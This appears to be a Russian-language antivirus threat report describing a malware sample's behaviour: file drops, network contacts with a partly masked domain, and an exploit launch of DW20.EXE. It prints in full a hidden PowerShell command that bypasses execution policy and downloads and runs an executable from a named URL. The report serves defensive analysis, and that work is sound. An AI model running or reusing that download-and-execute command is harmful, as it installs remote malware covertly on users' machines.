Техническая информация
Вредоносные функции
Загружает и запускает на исполнение
- http://elmnzel.com/cache/output.exe как c:\users\public\audioservice.exe
Запускает на исполнение (эксплоит)
- '%CommonProgramFiles%\Microsoft Shared\DW\DW20.EXE' -x -s 1916
Изменения в файловой системе
Создает следующие файлы
- %TEMP%\930608.cvr
Сетевая активность
Подключается к
- 'el##zel.com':80
- 'el##zel.com':443
TCP
Запросы HTTP GET
- http://el##zel.com/cache/output.exe
Другие
- 'el##zel.com':443
UDP
- DNS ASK el##zel.com
Другое
Создает и запускает на исполнение
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -WindowStyle hidden -ExecutionPolicy bypass -nologo -noprofile -c IEX ((New-Object System.Net.WebClient)).DownloadFile('http://elmnzel.com/cache/output.exe','C:\Users\Public\AudioService.exe');...' (со скрытым окном)
